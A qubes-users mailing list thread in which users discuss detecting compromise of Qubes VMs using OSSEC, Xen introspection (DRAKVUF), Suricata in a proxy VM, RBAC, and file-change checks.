Intrusion detection daemons in VMs
414 views
Skip to first unread message
migue...@gmail.com
Nov 3, 2016, 6:42:21 PM11/3/16
to qubes-users
Coming out of a discussion in https://groups.google.com/forum/#!topic/qubes-users/hs2yapPlUVA
I am interested, does anyone run intrusion detection tools within their VMs?
I use OSSEC [1] extensively elsewhere (on servers), but not sure it would work so well in agent-server model in Qubes.
'local' mode would work, but I would still want to get notifications of events/attacks, even from vaulted VMs that can't send email.
Since Qubes design suggests we should expect VM compromise, I think it makes sense to having something looking for such a compromise rather than just periodically rebuild my VMs (as I currently do).
Anyone else looked into a nice solution?
Zrubi
Nov 4, 2016, 5:35:14 AM11/4/16
to migue...@gmail.com, qubes-users
On 11/03/2016 11:42 PM, migue...@gmail.com wrote:
> Coming out of a discussion in https://groups.google.com/forum/#!topic/qubes-users/hs2yapPlUVA
>
> I am interested, does anyone run intrusion detection tools within their VMs?
Intrusion/virus detection inside the affected VM not really makes sense.
> Coming out of a discussion in https://groups.google.com/forum/#!topic/qubes-users/hs2yapPlUVA
>
> I am interested, does anyone run intrusion detection tools within their VMs?
However newer Xen versions has a nice feature:
https://wiki.xenproject.org/wiki/Virtual_Machine_Introspection
And already a real project using this feature:
https://drakvuf.com/
That feature wound really make sense and would fit in Qubes philosophy
pretty nicely.
Another - currently implementable - way to use a proxy VM (as it is
currently used as a dnf/yum proxy) and install your desired intrusion
detection software there.
Suricata is a good candidate for such thing:
https://suricata-ids.org/
(I would just need more time and more RAM to play with such things ;)
--
Zrubi
7v5w7go9ub0o
Nov 4, 2016, 11:36:27 AM11/4/16
to qubes...@googlegroups.com
On 11/04/2016 09:35 AM, Zrubi wrote:
> On 11/03/2016 11:42 PM, migue...@gmail.com wrote:
>> Coming out of a discussion in https://groups.google.com/forum/#!topic/qubes-users/hs2yapPlUVA
>>
>> I am interested, does anyone run intrusion detection tools within their VMs?
> Intrusion/virus detection inside the affected VM not really makes sense.
space extensions and simply monitor mail while gathering account
information - working temporarily while hoping that the infection would
be saved and re-used in future sessions (an argument for never using
mail client internal browsers, and for always running WAN-apps in DispVMs)
>
> However newer Xen versions has a nice feature:
> https://wiki.xenproject.org/wiki/Virtual_Machine_Introspection
>
> And already a real project using this feature:
> https://drakvuf.com/
>
>
> That feature wound really make sense and would fit in Qubes philosophy
> pretty nicely.
>
>
> Another - currently implementable - way to use a proxy VM (as it is
> currently used as a dnf/yum proxy) and install your desired intrusion
> detection software there.
> Suricata is a good candidate for such thing:
> https://suricata-ids.org/
>
> (I would just need more time and more RAM to play with such things ;)
>
rules for normal operation for a day, then turn on enforcing mode and
block/flag any system or user actions that are exceptional. (RBAC can
easily be programmed to allow access only to specific, authorized net
addresses - perhaps easier than devising an iptables-adjusting script)
This RBAC protection is an optional part of the standard kernel
hardening patch.
IIRC other kernel hardening software have something similar to RBAC.
Andrew David Wong
Nov 4, 2016, 10:09:37 PM11/4/16
to Zrubi, qubes-users
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
On 2016-11-04 02:35, Zrubi wrote:
> On 11/03/2016 11:42 PM, migue...@gmail.com wrote:
>> Coming out of a discussion in https://groups.google.com/forum/#!topic/qubes-users/hs2yapPlUVA
>>
>> I am interested, does anyone run intrusion detection tools within their VMs?
>
> Intrusion/virus detection inside the affected VM not really makes sense.
>
> However newer Xen versions has a nice feature:
> https://wiki.xenproject.org/wiki/Virtual_Machine_Introspection
>
> And already a real project using this feature:
> https://drakvuf.com/
>
>
> That feature wound really make sense and would fit in Qubes philosophy
> pretty nicely.
>
Very interesting. Tracking it here:
https://github.com/QubesOS/qubes-issues/issues/2417
- --
Andrew David Wong (Axon)
Community Manager, Qubes OS
https://www.qubes-os.org
-----BEGIN PGP SIGNATURE-----
iQIcBAEBCgAGBQJYHT9WAAoJENtN07w5UDAweL8P/icYG1gXNo34oA7ajaZ+lEKC
4fw+VMBXpxQovp74kfz26mCtMfP+huguoi5klKTBe+7+/At/tMsMhe6O/Hfs8PLQ
5Ynerq0y6NdSskEThbIrxqAVGh4avlQjloEJwMtlw0Ww0Stj/B0cmocSq/WoR2BS
dzf1lEyN2M9IWC7yo1ottx7EnR1LPvBoIri9yJd2z0A3VTgjlXVDbrksvipCdnj3
nHrvpRqr+5wZzrZkUqH8N2IW6eT/ErCDeR7lOBao78VXCSp+BuQCew81ATyCzlkf
AH3wSHfJXWPjj27UA+OvctOaT1nBxO9wp/ZBp+vutFFMKcBMzgWHJkhDqmauYPDT
Nay6qadL4xnsHlVTXni5RdxO/1gB3R3UOhCeToHh27RxSMKqvezFQ9fxZ0LuYfI1
5581UtcCgpSF9rTuWvproHnSqSHPFNdRz0lhl1JLV8dN0DEaimfaK9WmHPs5RgEI
srU+AZgRVnd/mE6iQInEx4Nj940TOA2hQePfF41yPjIaynnWmZXoczUEUyXsgnd6
bsJNXdBeRZUClpC39J9MiueYINQA/5Pz2uOfy/hDuz3enEGf6BX2sHjSv0zlKZkR
L9LPN/sVoxYsIdvMxUm/LezBaSfEpFGA94JsJ7eDeDRXXCBwAK9DLhYoDkFXfpiF
gBNJPPXExmjP/iqrnKp2
=6yg3
-----END PGP SIGNATURE-----
Hash: SHA512
On 2016-11-04 02:35, Zrubi wrote:
> On 11/03/2016 11:42 PM, migue...@gmail.com wrote:
>> Coming out of a discussion in https://groups.google.com/forum/#!topic/qubes-users/hs2yapPlUVA
>>
>> I am interested, does anyone run intrusion detection tools within their VMs?
>
> Intrusion/virus detection inside the affected VM not really makes sense.
>
> However newer Xen versions has a nice feature:
> https://wiki.xenproject.org/wiki/Virtual_Machine_Introspection
>
> And already a real project using this feature:
> https://drakvuf.com/
>
>
> That feature wound really make sense and would fit in Qubes philosophy
> pretty nicely.
>
https://github.com/QubesOS/qubes-issues/issues/2417
- --
Andrew David Wong (Axon)
Community Manager, Qubes OS
https://www.qubes-os.org
-----BEGIN PGP SIGNATURE-----
iQIcBAEBCgAGBQJYHT9WAAoJENtN07w5UDAweL8P/icYG1gXNo34oA7ajaZ+lEKC
4fw+VMBXpxQovp74kfz26mCtMfP+huguoi5klKTBe+7+/At/tMsMhe6O/Hfs8PLQ
5Ynerq0y6NdSskEThbIrxqAVGh4avlQjloEJwMtlw0Ww0Stj/B0cmocSq/WoR2BS
dzf1lEyN2M9IWC7yo1ottx7EnR1LPvBoIri9yJd2z0A3VTgjlXVDbrksvipCdnj3
nHrvpRqr+5wZzrZkUqH8N2IW6eT/ErCDeR7lOBao78VXCSp+BuQCew81ATyCzlkf
AH3wSHfJXWPjj27UA+OvctOaT1nBxO9wp/ZBp+vutFFMKcBMzgWHJkhDqmauYPDT
Nay6qadL4xnsHlVTXni5RdxO/1gB3R3UOhCeToHh27RxSMKqvezFQ9fxZ0LuYfI1
5581UtcCgpSF9rTuWvproHnSqSHPFNdRz0lhl1JLV8dN0DEaimfaK9WmHPs5RgEI
srU+AZgRVnd/mE6iQInEx4Nj940TOA2hQePfF41yPjIaynnWmZXoczUEUyXsgnd6
bsJNXdBeRZUClpC39J9MiueYINQA/5Pz2uOfy/hDuz3enEGf6BX2sHjSv0zlKZkR
L9LPN/sVoxYsIdvMxUm/LezBaSfEpFGA94JsJ7eDeDRXXCBwAK9DLhYoDkFXfpiF
gBNJPPXExmjP/iqrnKp2
=6yg3
-----END PGP SIGNATURE-----
migue...@gmail.com
Nov 5, 2016, 12:16:12 AM11/5/16
to qubes-users, migue...@gmail.com
On Friday, November 4, 2016 at 8:35:14 PM UTC+11, Laszlo Zrubecz wrote:
> Another - currently implementable - way to use a proxy VM (as it is
> currently used as a dnf/yum proxy) and install your desired intrusion
> detection software there.
> Suricata is a good candidate for such thing:
> https://suricata-ids.org/
> Another - currently implementable - way to use a proxy VM (as it is
> currently used as a dnf/yum proxy) and install your desired intrusion
> detection software there.
> Suricata is a good candidate for such thing:
> https://suricata-ids.org/
If I view a malicious jpeg image on a site that drops malware onto my browsing VM, I want to know about that. Quite possible that a proxyVM would not help me here if it doesn't match some known signature. That sounds more like intrusion *prevention* than detection (though I know Suricata does both).
Something like OSSEC might, however, tell me that some new file exists or existing file has changed in some unexpected way, or that a new service has started listening on a port (whether or not the Qubes firewall is blocking). The knowledge is what matters to me most.
Anyway thanks - I know of many of the products out there, just was interested to hear if anyone had implemented on their Qubes in practice.
Cheers
Zrubi
Apr 24, 2017, 6:04:54 AM4/24/17
to qubes...@googlegroups.com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
On 11/04/2016 10:35 AM, Zrubi wrote:
> Another - currently implementable - way to use a proxy VM (as it
> is currently used as a dnf/yum proxy) and install your desired
> intrusion detection software there. Suricata is a good candidate
> for such thing: https://suricata-ids.org/
>
> (I would just need more time and more RAM to play with such things
> ;)
And finally now I have enough RAM, and got some time too :)
Here is the result:
http://zrubi.hu/en/2017/traffic-analysis-qubes/
Any comments and/or suggestions are welcome.
- --
Zrubi
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQIcBAEBCAAGBQJY/c20AAoJEH7adOMCkunmSu8P/A4jZDdD7DXhux8rQTI9n9ky
r2ub1588ha3zy8I9Zb3fzQzPzes5YkhRFP8gAy972c94qRZsYesqeqh402ZBW/eL
eIRGn6n+sFChGEjWSK18JzGbN82L4O5PXU/WPGSgEiKoYwij4gtRavqZ9KjSsS18
eSs/cRcy7qRIbpQzbHKamFiEBeH10nBT3LWZJ7KbGR4vitmSonKhzXTdcImmkisq
3T671O4pMbu3+njd6wg5HmI8aje4xzyj7nJ9Gyzvhz+Ymh+60KjIo54/I1SljLv6
jiju+I4164xHH3jSQOrcRCEibIl8GFcybl2ey3bYtuN93VF27xyxzku08GvhUWo1
rl6PjGIi8q7uhIttqBB549/HIj4ZOIJkE1NwlOBkIf4H+bVumbW3c7HJKWKFj+uR
/+Dk++K1Lk4QDveZ3NGY7z3Eg2R42maAydLjj/lkRVHSCcJZ+aKNZGVhjOXGdPYu
3TcoODDVAV4Oj0jeUGqe7vN77N0KBO8isvdgyoLTubXZMxWbyNcIZLzqqWqZ9Vhf
SXz2jX+GiyzxrY5AkNQ6JHhVrEhiNQGV4EXniaH3ehrX1RSmPko0dbyRJvGXEPoI
qhBkrwKEkGDrCVPzVU0khGLy3QSz4LlHa9KsSO9/RMIN7W10C555s5g+kpSgxz7t
SOjw2PMcOm+tvGdcwuDk
=XRSk
-----END PGP SIGNATURE-----
Hash: SHA256
On 11/04/2016 10:35 AM, Zrubi wrote:
> Another - currently implementable - way to use a proxy VM (as it
> is currently used as a dnf/yum proxy) and install your desired
> intrusion detection software there. Suricata is a good candidate
> for such thing: https://suricata-ids.org/
>
> (I would just need more time and more RAM to play with such things
> ;)
Here is the result:
http://zrubi.hu/en/2017/traffic-analysis-qubes/
Any comments and/or suggestions are welcome.
- --
Zrubi
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQIcBAEBCAAGBQJY/c20AAoJEH7adOMCkunmSu8P/A4jZDdD7DXhux8rQTI9n9ky
r2ub1588ha3zy8I9Zb3fzQzPzes5YkhRFP8gAy972c94qRZsYesqeqh402ZBW/eL
eIRGn6n+sFChGEjWSK18JzGbN82L4O5PXU/WPGSgEiKoYwij4gtRavqZ9KjSsS18
eSs/cRcy7qRIbpQzbHKamFiEBeH10nBT3LWZJ7KbGR4vitmSonKhzXTdcImmkisq
3T671O4pMbu3+njd6wg5HmI8aje4xzyj7nJ9Gyzvhz+Ymh+60KjIo54/I1SljLv6
jiju+I4164xHH3jSQOrcRCEibIl8GFcybl2ey3bYtuN93VF27xyxzku08GvhUWo1
rl6PjGIi8q7uhIttqBB549/HIj4ZOIJkE1NwlOBkIf4H+bVumbW3c7HJKWKFj+uR
/+Dk++K1Lk4QDveZ3NGY7z3Eg2R42maAydLjj/lkRVHSCcJZ+aKNZGVhjOXGdPYu
3TcoODDVAV4Oj0jeUGqe7vN77N0KBO8isvdgyoLTubXZMxWbyNcIZLzqqWqZ9Vhf
SXz2jX+GiyzxrY5AkNQ6JHhVrEhiNQGV4EXniaH3ehrX1RSmPko0dbyRJvGXEPoI
qhBkrwKEkGDrCVPzVU0khGLy3QSz4LlHa9KsSO9/RMIN7W10C555s5g+kpSgxz7t
SOjw2PMcOm+tvGdcwuDk
=XRSk
-----END PGP SIGNATURE-----
cyrinux
Apr 24, 2017, 8:49:58 AM4/24/17
to qubes-users, migue...@gmail.com
Chris Laprise
Apr 24, 2017, 12:54:37 PM4/24/17
to Zrubi, qubes...@googlegroups.com
On 04/24/2017 06:04 AM, Zrubi wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> On 11/04/2016 10:35 AM, Zrubi wrote:
>
>> Another - currently implementable - way to use a proxy VM (as it
>> is currently used as a dnf/yum proxy) and install your desired
>> intrusion detection software there. Suricata is a good candidate
>> for such thing: https://suricata-ids.org/
>>
>> (I would just need more time and more RAM to play with such things
>> ;)
>
> And finally now I have enough RAM, and got some time too :)
> Here is the result:
>
> http://zrubi.hu/en/2017/traffic-analysis-qubes/
Thanks for the guide; I will have to try it soon.
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> On 11/04/2016 10:35 AM, Zrubi wrote:
>
>> Another - currently implementable - way to use a proxy VM (as it
>> is currently used as a dnf/yum proxy) and install your desired
>> intrusion detection software there. Suricata is a good candidate
>> for such thing: https://suricata-ids.org/
>>
>> (I would just need more time and more RAM to play with such things
>> ;)
>
> And finally now I have enough RAM, and got some time too :)
> Here is the result:
>
> http://zrubi.hu/en/2017/traffic-analysis-qubes/
I may add a detection mechanism for file changes in my VM hardening project:
https://github.com/tasket/Qubes-VM-hardening/issues/4
The checks would occur before private.img is mounted as /rw.
--
Chris Laprise, tas...@openmailbox.org
https://twitter.com/ttaskett
PGP: BEE2 20C5 356E 764A 73EB 4AB3 1DC4 D106 F07F 1886
Reply all
Reply to author
Forward
0 new messages